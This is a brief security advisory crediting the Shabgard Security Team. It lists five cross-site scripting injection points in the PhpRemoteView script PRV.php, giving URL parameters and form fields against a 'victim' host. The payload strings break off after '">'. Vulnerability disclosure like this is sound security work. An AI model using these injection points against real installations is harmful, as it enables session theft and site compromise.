---------------------------------------------
PhpRemoteView Multiple Xss Vulnerabilities
---------------------------------------------
Site:
http://php.spb.ru/remview/
Bug:
1- http://victim/path/PRV.php?&c=v&d=[path]&f=">
2- http://victim/path/PRV.php?c=l&d=">
3-
http://victim/path/PRV.php?c=setup&ref=">
4-http://victim/path/PRV.php?c=d&d=[path]
MAKE DIR (type full path) : ">
5-http://victim/path/PRV.php?c=d&d=[path]
Full file name : ">
---------------------------------------------
Source :
http://soot.shabgard.org/bugs/phpremoteview.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org
Greetz :
Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------